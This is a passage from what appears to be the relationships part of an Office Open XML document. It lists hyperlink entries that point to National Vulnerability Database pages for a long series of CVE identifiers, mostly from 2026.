Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52877" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53507" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54100" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57164" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70473" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70476" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73241" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73242" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73292" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73541" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75842" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75912" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76225" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80469" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82404" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82662" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82750" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82751" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84173" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84195" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84196" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85048" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85091" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85211" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85538" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86750" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87090" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87479" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87480" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87481" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87487" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87506" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87510" TargetMode="External" Id="rId1693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87524" TargetMode="External" Id="rId1694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87553" TargetMode="External" Id="rId1695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87572" TargetMode="External" Id="rId1696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87578" TargetMode="External" Id="rId1697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87582" TargetMode="External" Id="rId1698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87604" TargetMode="External" Id="rId1699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87616" TargetMode="External" Id="rId1700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87618" TargetMode="External" Id="rId1701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87628" TargetMode="External" Id="rId1702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87639" TargetMode="External" Id="rId1703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87644" TargetMode="External" Id="rId1704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87648" TargetMode="External" Id="rId1705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88883" TargetMode="External" Id="rId1706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12855" TargetMode="External" Id="rId1707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18664" TargetMode="External" Id="rId1708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18730" TargetMode="External" Id="rId1709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19401" TargetMode="External" Id="rId1710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19538" TargetMode="External" Id="rId1711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24262" TargetMode="External" Id="rId1712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24263" TargetMode="External" Id="rId1713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26007" TargetMode="External" Id="rId1714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28498" TargetMode="External" Id="rId1715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33810" TargetMode="External" Id="rId1716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41424" TargetMode="External" Id="rId1717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41604" TargetMode="External" Id="rId1718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44487" TargetMode="External" Id="rId1719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44506" TargetMode="External" Id="rId1720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47626" TargetMode="External" Id="rId1721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47719" TargetMode="External" Id="rId1722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48763" TargetMode="External" Id="rId1723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48771" TargetMode="External" Id="rId1724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId1725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53500" TargetMode="External" Id="rId1726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53501" TargetMode="External" Id="rId1727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53761" TargetMode="External" Id="rId1728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53938" TargetMode="External" Id="rId1729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54556" TargetMode="External" Id="rId1730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54600" TargetMode="External" Id="rId1731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55528" TargetMode="External" Id="rId1732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55533" TargetMode="External" Id="rId1733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55571" TargetMode="External" Id="rId1734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56670" TargetMode="External" Id="rId1735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56672" TargetMode="External" Id="rId1736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58010" TargetMode="External" Id="rId1737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58012" TargetMode="External" Id="rId1738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58013" TargetMode="External" Id="rId1739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61638" TargetMode="External" Id="rId1740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62673" TargetMode="External" Id="rId1741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62959" TargetMode="External" Id="rId1742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63135" TargetMode="External" Id="rId1743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63376" TargetMode="External" Id="rId1744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63407" TargetMode="External" Id="rId1745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63409" TargetMode="External" Id="rId1746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64380" TargetMode="External" Id="rId1747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6485" TargetMode="External" Id="rId1748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65832" TargetMode="External" Id="rId1749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67354" TargetMode="External" Id="rId1750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67355" TargetMode="External" Id="rId1751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67398" TargetMode="External" Id="rId1752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67607" TargetMode="External" Id="rId1753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69247" TargetMode="External" Id="rId1754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId1756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId1758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70486" TargetMode="External" Id="rId1759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71315" TargetMode="External" Id="rId1760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72922" TargetMode="External" Id="rId1761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId1762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId1763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId1764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73136" TargetMode="External" Id="rId1765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73214" TargetMode="External" Id="rId1766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73303" TargetMode="External" Id="rId1767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73658" TargetMode="External" Id="rId1769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73666" TargetMode="External" Id="rId1770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74907" TargetMode="External" Id="rId1771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId1772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId1773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId1774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77348" TargetMode="External" Id="rId1775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77358" TargetMode="External" Id="rId1776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77634" TargetMode="External" Id="rId1777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77641" TargetMode="External" Id="rId1778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77822" TargetMode="External" Id="rId1779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId1780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78491" TargetMode="External" Id="rId1781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79645" TargetMode="External" Id="rId1782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId1783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId1784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId1785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId1786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId1787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82209" TargetMode="External" Id="rId1788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82262" TargetMode="External" Id="rId1789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82263" TargetMode="External" Id="rId1790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82586" TargetMode="External" Id="rId1791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82728" TargetMode="External" Id="rId1792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82753" TargetMode="External" Id="rId1793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82869" TargetMode="External" Id="rId1794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82871" TargetMode="External" Id="rId1795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId1796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85596" TargetMode="External" Id="rId1798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85597" TargetMode="External" Id="rId1799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85730" TargetMode="External" Id="rId1800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86145" TargetMode="External" Id="rId1801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86251" TargetMode="External" Id="rId1802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86253" TargetMode="External" Id="rId1803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86258" TargetMode="External" Id="rId1804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86297" TargetMode="External" Id="rId1805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId1806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId1807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88897" TargetMode="External" Id="rId1808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89054" TargetMode="External" Id="rId1809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-58375" TargetMode="External" Id="rId1810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63822" TargetMode="External" Id="rId1811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9566" TargetMode="External" Id="rId1812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18147" TargetMode="External" Id="rId1813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19219" TargetMode="External" Id="rId1814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19303" TargetMode="External" Id="rId1815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19594" TargetMode="External" Id="rId1816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19693" TargetMode="External" Id="rId1817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19991" TargetMode="External" Id="rId1818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32257" 